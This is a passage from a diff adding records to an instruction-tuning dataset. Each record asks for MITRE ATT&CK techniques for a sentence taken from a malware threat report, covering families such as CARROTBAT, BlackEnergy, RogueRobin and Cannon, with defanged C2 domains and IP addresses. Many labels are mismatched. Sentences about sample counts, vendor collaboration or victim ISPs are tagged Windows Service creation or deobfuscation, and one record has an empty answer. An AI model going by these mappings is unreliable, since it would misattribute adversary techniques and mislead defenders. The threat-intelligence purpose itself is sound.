MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main function of the Trojan interacts with its configured C2 server to obtain additional code to execute", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\u201cKnock\u201d also appears in several strings inside the code of SpeakUp", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It maintains both code and data in the raw, encrypted blobs of data to be decrypted and used at runtime, and hidden functionality that isn\u2019t exposed until runtime", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In total, 29 unique CARROTBAT samples have been identified to date, containing a total of 12 confirmed unique decoy documents", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The following function written in Python may be used to decode this file:def decode(data): ", + "output": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called: \u00a0int num = 5; int num2 = 155; bool flag = num > num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"\"Invoke\"\", new object[] { null, new object[0] }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task\"", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "(Source: Dell SecureWorks) Both the redirect code on the compromised site and the exploit code appear and disappear, indicating that the adversaries add the code when they want to leverage the SWC and remove the code when it is not in use to limit the visibility of their operations", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Further collaboration between FireEye as a Service (FaaS), Mandiant and FireEye iSIGHT intelligence uncovered additional victims worldwide, a new suite of tools and novel techniques", + "output": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition, web traffic between a service provider\u2019s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily", + "output": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These parameters install it as a service", + "output": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware operates on victims\u2019 systems as a svchost-based service and is capable of downloading executables, changing its own configuration, updating its own binaries, terminating its own processes, and activating and terminating denial-of-service attacks", + "output": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malicious DLL is not a service DLL because it lacks ServiceMain()", + "output": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The victims Data from Cadelle\u2019s C&C servers shows that a large number of Backdoor.Cadelspy infections affected individual users of Iranian internet service providers (ISPs) and hosting services", + "output": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The document brought Talos a new gift - a new version of ROKRAT", + "output": "- T1543: Create or Modify System Process\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file download from a c2 server", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One of the discovered config files contained a URL with an as yet unidentified md5: hxxps://46.165.222(dot)28/upgrade/bf0dac805798cc1f633f19ce8ed6382f/upgrade.php Victim set #4 A set of victims discovered\u00a0installed Siemens SCADA software in their ICS environment was responsible for downloading and executing BlackEnergy", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HighShell v5.0 explorer tab allows actor to navigate the file system The HighShell v7.1 variant from the data dump contains similar functionality to its predecessors and continued the tabular approach but expanded even further by splitting out the main functionality across multiple tabs, specifically \u201cCommand\u201d, \u201cExplorer\u201d, \u201cUpload\u201d, \u201cDownload\u201d, \u201cSql Server\u201d and \u201cChange Time\u201d", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It uses the Dropbox API with a hardcoded bearer access token and has the ability to download, upload, and execute files", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 4 Microsoft Word attempting to download the remote template If the C2 server is active at the time the document is opened, it will successfully retrieve the malicious macro and load it in the same Microsoft Word session", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The POSHSPY backdoor is designed to download and execute additional PowerShell code and Windows binaries", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The IRC variant of MPK has a command set (Table 2) that makes this an effective backdoor Trojan, specifically allowing the actors to steal credentials from the targeted system via keylogging, to navigate and interact with the file system, to run arbitrary commands, and to download and execute additional tools on the system", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 8 shows the network communication of the Pause.ps1 download", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It will: Download and execute the backdoor component Replace the content of the downloader Mach-O executable with a decoy, either using a base64-encoded embedded file or by downloading it from the internet Open a decoy document (described later) Close the Terminal window that just opened The decoy document replaces the downloader Mach-O file, which means the malicious executable is only present in the ZIP file now", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the victim downloads and executes the email attachment, it runs silently with no additional decoy documents or decoy dialog boxes", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 2 SYSCON network traffic witnessed during execution \u00a0 Pivoting on the domain hosting the SYSCON sample, 881.000webhostapp[.]com, revealed a number of additional samples, including a sample of the KONNI malware family, and four 64-bit executable files belonging to the CARROTBAT malware family", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CARROTBAT itself is a dropper that allows an attacker to drop and open an embedded decoy file, followed by the execution of a command that will download and run a payload on the targeted machine", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The script self-scheduling, as well as the scheduling of a script that repeatedly attempts to download and execute the Revenge RAT binary, significantly contribute to the persistence of this infection", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We found a mechanism for decrypting, executing, and downloading an additional payload from the C&C server.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The backdoor has the capability to download and upload files, execute shell commands, and update its configuration.", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We mentioned earlier that due to the nature of the IE injection technique used by the HTTP-based backdoors, a number of C2 commands were cached to disk", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it Figure 2: Configuration file that adds TCP tunnels and records desktop video Command and Control CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Table 2 Sandbox evasion checks in the C# variant of RogueRobin Like the original version, the C# variant of RogueRobin uses DNS tunneling to communicate with its C2 server using a variety of different DNS query types", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Character Digit h 0 i 1 j 2 k 3 l 4 m 5 n 6 o 7 p 8 q 9 Table 4 Character substitution used in RogueRobin The Trojan will use future DNS requests to retrieve jobs from the C2 server, which the Trojan will handle as commands", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Background From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an HTTP-based backdoor that communicates with its C2 server", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "11/1/18 sahro.bella7 trala.cosh2 Bishtr.cam47 Lobrek.chizh Cervot.woprov Table 5 Gathered C# Cannon samples As mentioned in our initial blog, the actor controlled email address acting as the C2 was sahro.bella7[at]post.cz, but all previous samples of Cannon used sym777.g[at]post.cz", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The screenshot in Figure 8 of the inf method within a Cannon sample (SHA256: 4405cfbf28\u2026) shows the information gathered that is exfiltrated to the C2 via email, specifically with RunningPlace and LogicalDrives header strings: Figure 8 inf method used by Cannon When comparing the two Cannon variants, we found a method within a Delphi Cannon sample (SHA256: 5a02d4e5f6\u2026) showing the use of Running place and Logical_Drivers as header strings to the system information it is collecting and sending to the C2 via email", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The shellcode retrieves an additional payload by connecting to the following C2 server using DNS: aaa.stage.14919005.www1.proslr3[.]com Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Retriever uses .NET web services and the SoapHttpClientProtocol class to communicate with its C2 server, which generates HTTP requests resembling the example request in Figure 4", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Table 3: FELIXROOT backdoor parameters Cryptography All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "http://www.cankayasrc[.]com/style/js/main.php http://ektamservis[.]com/includes/main.php http://gtme[.]ae/font-awesome/css/main.php Recommendations for organizations Effective protection from targeted attacks focuses on advanced detective, preventive and investigative capabilities via solutions and training, allowing an organization to control any activities on their network or suspicious files on user systems", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "tfvn[.]com[.]vnshirkeswitch[.]netguideofgeorgia[.]orggulfclouds[.]sitejhssourcingltd[.]comkamagra4uk[.]compioneerfitting[.]compositronicsindia[.]comscseguros[.]ptspldernet[.]comtoshioco[.]comwww[.]happytohelpyou[.]inIP addressesThe following IP addresses have been observed to be associated with malware campaigns.112.213.89[.]4067.23.254[.]6162.212.33[.]98153.92.5[.]124185.117.22[.]19723.94.188[.]24667.23.254[.]17072.52.150[.]218148.66.136[.]62107.180.24[.]253108.179.246[.]13818.221.35[.]21494.46.15[.]20066.23.237[.]18672.52.150[.]218URLs:The following URLs have been observed to be associated with malware campaigns.https[:]//a[.]pomf[.]cat/http[:]//pomf[.]cat/upload[.]php", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The initial DNS query sent by the payload to obtain the system specific identifier uses the following structure, which includes the current process identifier (PID) as the subdomain of the C2 domain: . The C2 